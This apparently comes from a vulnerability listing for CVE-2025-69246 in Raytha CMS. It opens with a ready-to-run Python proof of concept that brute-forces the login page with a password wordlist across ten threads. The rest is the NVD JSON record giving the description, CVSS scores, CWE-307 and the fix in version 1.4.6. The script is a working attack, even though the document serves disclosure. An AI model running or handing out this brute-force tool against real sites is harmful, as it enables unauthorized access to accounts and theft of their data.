CVE-2025-69246

#!/usr/bin/env python3 """ CVE-2025-69246 PoC - Raytha CMS Brute Force Login This PoC demonstrates the lack of brute force protection in Raytha CMS. Use only for authorized security testing. """ import requests import sys from concurrent.futures import ThreadPoolExecutor, as_completed TARGET_URL = "https://target-site.com/auth/login" # Replace with target URL USERNAME = "admin" # Target username PASSWORD_FILE = "passwords.txt" # Wordlist file MAX_THREADS = 10 def try_login(password): """Attempt login with given password""" data = { "email": USERNAME, "password": password.strip(), "return_url": "/" } try: response = requests.post(TARGET_URL, data=data, timeout=10, allow_redirects=False) # Successful login typically returns redirect or specific status if response.status_code in [200, 302] and "login" not in response.headers.get("Location", ""): return password.strip(), True except requests.RequestException: pass return password.strip(), False def main(): print(f"[*] CVE-2025-69246 PoC - Raytha CMS Brute Force") print(f"[*] Target: {TARGET_URL}") print(f"[*] Username: {USERNAME}") try: with open(PASSWORD_FILE, 'r') as f: passwords = f.readlines() except FileNotFoundError: print(f"[!] Password file not found: {PASSWORD_FILE}") sys.exit(1) print(f"[*] Loaded {len(passwords)} passwords, starting attack...") with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: futures = {executor.submit(try_login, pwd): pwd for pwd in passwords} for future in as_completed(futures): pwd, success = future.result() if success: print(f"\n[!] VALID PASSWORD FOUND: {pwd}") print("[*] Attack completed successfully") sys.exit(0) else: print(f"[*] Tried: {pwd}", end='\r') print("\n[!] No valid password found") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-69246", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:18:02.093", "lastModified": "2026-03-16T19:21:32.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Raytha CMS does not have any brute force protection mechanism implemented. It allows an attacker to send multiple automated logon requests without triggering lockout, throttling, or step-up challenges.\n\nThis issue was fixed in version 1.4.6."}, {"lang": "es", "value": "Raytha CMS no tiene ningún mecanismo de protección contra fuerza bruta implementado. Permite a un atacante enviar múltiples solicitudes de inicio de sesión automatizadas sin activar el bloqueo de cuenta, la limitación de velocidad o los desafíos de autenticación escalonada.\n\nEste problema fue solucionado en la versión 1.4.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:raytha:raytha:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.6", "matchCriteriaId": "4A4FC7D6-F33F-4121-A375-B063263585FD"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2026/03/CVE-2025-69236", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://raytha.com", "source": "[email protected]", "tags": ["Product"]}]}}